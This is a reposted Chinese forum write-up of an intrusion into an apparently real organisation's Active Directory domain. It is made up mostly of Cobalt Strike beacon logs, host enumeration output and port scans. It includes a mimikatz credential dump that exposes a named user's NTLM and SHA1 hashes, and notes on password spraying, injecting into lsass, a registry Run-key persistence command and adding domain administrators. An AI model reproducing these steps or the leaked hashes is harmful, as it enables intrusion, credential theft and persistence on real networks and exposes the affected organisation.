现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
0x00 前言
0x01 前期渗透
System Idle Process 0 N/ASystem 4 N/Asmss.exe 240 N/Acsrss.exe 376 N/Awininit.exe 436 N/Aservices.exe 524 N/Alsass.exe 532 Kdc, KeyIso, Netlogon, NTDS, SamSssvchost.exe 672 BrokerInfrastructure, DcomLaunch, LSM,PlugPlay, Power, SystemEventsBrokersvchost.exe 716 RpcEptMapper, RpcSsWRSA.exe 820 WRSVCsvchost.exe 276 Dhcp, EventLog, lmhosts, Wcmsvcsvchost.exe 320 Appinfo, BITS, CertPropSvc, gpsvc, IAS,IKEEXT, iphlpsvc, LanmanServer, ProfSvc,Schedule, seclogon, SENS, SessionEnv,ShellHWDetection, Themes, Winmgmtsvchost.exe 516 EventSystem, FontCache, netprofm, nsi,W32Time, WinHttpAutoProxySvcsvchost.exe 932 CryptSvc, Dnscache, LanmanWorkstation,NlaSvc, WinRMsvchost.exe 1100 BFE, DPS, MpsSvcspoolsv.exe 1508 SpoolerMicrosoft.ActiveDirectory 1540 ADWSOfficeClickToRun.exe 1792 ClickToRunSvcsvchost.exe 1844 ddpvssvcdfsrs.exe 1892 DFSRsvchost.exe 1908 DHCPServersvchost.exe 1936 DiagTrackdns.exe 1980 DNSfmaonsite.exe 2024 FMAuditOnsiteismserv.exe 1340 IsmServMicrosoft.BDD.MonitorServ 1432 MDT_MonitorMSOIDSVC.EXE 2660 msoidsvcsvchost.exe 2328 Net Driver HPZ12OpenDNSAuditService.exe 2220 OpenDNS Active Directory ServiceMSOIDSVCM.EXE 1256 N/Asvchost.exe 2172 Pml Driver HPZ12ScreenConnect.ClientServi 556 ScreenConnect Client (62c0d7e1d3b94bc5)svchost.exe 1472 TermServiceOpenDNSAuditClient.exe 2924 N/Aconhost.exe 1380 N/AVGAuthService.exe 2096 VGAuthServicevmtoolsd.exe 612 VMToolsWRCoreService.x64.exe 2136 WRCoreServiceWRSkyClient.x64.exe 3180 WRSkyClientdfssvc.exe 3316 DfsWmiPrvSE.exe 3484 N/Asvchost.exe 3568 UALSVC, UmRdpServiceVeeamDeploymentSvc.exe 3612 VeeamDeploySvcWRSvcMetrics.x64.exe 3580 N/Asvchost.exe 4216 PolicyAgentmsdtc.exe 4160 MSDTCDCA.Edge.Console.exe 3676 DCAPulseiashost.exe 4548 N/Awsmprovhost.exe 9104 N/Apowershell.exe 7828 N/Aconhost.exe 6688 N/Apowershell.exe 360 N/Aconhost.exe 5152 N/Anotepad.exe 1760 N/ALTSvcMon.exe 5424 LTSvcMonLTSVC.exe 7272 LTServicelabvnc.exe 5412 tvnserverVeeam.EndPoint.Service.ex 8316 VeeamEndpointBackupSvcwsmprovhost.exe 7108 N/AScreenConnect.WindowsBack 4384 N/Acsrss.exe 7564 N/Awinlogon.exe 5520 N/Adwm.exe 6572 N/Alabvnc.exe 5916 N/Ataskhostex.exe 8540 N/AWRSA.exe 2308 N/AScreenConnect.WindowsClie 3732 N/Aexplorer.exe 3964 N/AMRT.exe 4852 N/Avm3dservice.exe 2656 N/AMRT.exe 5196 N/Avmtoolsd.exe 5340 N/ADCA.Edge.TrayIcon.exe 6432 N/ALTTray.exe 4564 N/AWmiPrvSE.exe 6336 N/ATaskmgr.exe 6684 N/ALogonUI.exe 380 N/Acmd.exe 2400 N/Aconhost.exe 6216 N/Anet.exe 8100 N/Anet1.exe 8908 N/Acmd.exe 2956 N/Aconhost.exe 8300 N/Anet.exe 7344 N/Anet1.exe 5248 N/Acmd.exe 432 N/Aconhost.exe 9052 N/Anet.exe 7356 N/Anet1.exe 3156 N/Acmd.exe 8232 N/Aconhost.exe 4600 N/Anet.exe 5528 N/Anet1.exe 7352 N/Acmd.exe 4304 N/Aconhost.exe 7148 N/Avds.exe 3872 vdscmd.exe 7716 N/Aconhost.exe 8564 N/Atasklist.exe 9212 N/A
0x02 内网渗透
因为前期拿到了边缘机,这里查看systeminfo,发现是2012R2的主机。
Windows IP ConfigurationHost Name . . . . . . . . . . . . : CAMS-SQL3Primary Dns Suffix . . . . . . . : AVV.orgNode Type . . . . . . . . . . . . : HybridIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : NoDNS Suffix Search List. . . . . . : AVV.orgEthernet adapter Ethernet:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : vmxnet3 Ethernet AdapterPhysical Address. . . . . . . . . : 00-50-56-98-E3-D6DHCP Enabled. . . . . . . . . . . : NoAutoconfiguration Enabled . . . . : YesLink-local IPv6 Address . . . . . : fe80::a5b1:d534:730:3123%11(Preferred)IPv4 Address. . . . . . . . . . . : 10.2.0.49(Preferred)Subnet Mask . . . . . . . . . . . : 255.255.254.0
net group "domain controllers" /domain[04/26 18:16:59] beacon> shell net group "domain Controllers" /domain[04/26 18:17:00] [*] Tasked beacon to run: net group "domain Controllers" /domain[04/26 18:17:00] [+] host called home, sent: 69 bytes[04/26 18:17:00] [+] received output:The request will be processed at a domain controller for domain FPC.LOCAL.Group name Domain ControllersComment All domain controllers in the domainMembers-------------------------------------------------------------------------------AVV-DC1$ AVV-DC2$ AVV-DHDC01$AVV-DHDC02$
net group "domain admins" /domainfpcadmin mqd.nsmqd.rmm mqd.tdv
net time /domain[04/26 18:27:52] beacon> shell net time /domain[04/26 18:27:52] [*] Tasked beacon to run: net time /domain[04/26 18:27:52] [+] host called home, sent: 47 bytes[04/26 18:27:54] [+] received output:Current time at \\AVV-DC2.FPC.LOCAL is 4/26/2023 5:27:53 AM
[04/26 18:31:11] [+] =========== 查看主域控制器 ==========[04/26 18:31:12] [*] Tasked beacon to run: netdom query pdc[04/26 18:31:12] [+] host called home, sent: 47 bytes[04/26 18:31:14] [+] received output:Primary domain controller for the domain:AVV-DC1The command completed successfully.
portscan 10.2.0.0/24portscan 10.2.92.30/24portscan 10.6.0.10/24portscan 10.11.1.12/24
msv :[00000003] Primary* Username : mqd.tdv* Domain : FPC* NTLM : 7007ebae678042f1cf112578ac43bf68* SHA1 : 712ce4bf3a4a777582389d37f8d06158ed204f6btspkg :wdigest :* Username : mqd.tdv* Domain : FPC* Password : [email protected]#kerberos :* Username : mts.tdv* Domain : FPC* Password : [email protected]#ssp :credman :
0x03 内网横向
这里截图部分域内用户,做成密码表后直接进行喷洒,发现域管成功上线。
把当前进程注入到lsass进程中去。reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "C:\Windows\Temp\start.exe" //开机自启动添加域管理员,因为已经拿到域管理员的权限,所以可以添加域管理员,来进行权限维持(这里直接通过lstar的插件来进行域管理员的添加)
这里直接放后期上线的域控。
0x04 总结
可以通过添加域管理员来上线域内的所有主机可以通过cs来进行进程注入or进程迁移,来实现本机system权限的获取此次实战的密码喷洒尤为重要,所以有机器用户的hash一定要进行抓取SPN服务横向可以通过打邮服来进行获取域控权限学习了权限维持的方法(开机自启动、winrm的横向和psexec的横向)恶补了一大波内网知识(比靶场来的实在)
此次通过内网渗透,虽然打了邮件服务器,但是没有通过邮件服务器来拿下DC的权限。没有通过SPN票据横向拿下对应的服务器,比如MSSQL的和CIFS的此次没有利用白银票据进行横向(得重新学习)
文章来源:奇安信攻防社区(用户773616194)原文地址:https://forum.butian.net/share/2261
关 注 有 礼
推 荐 阅 读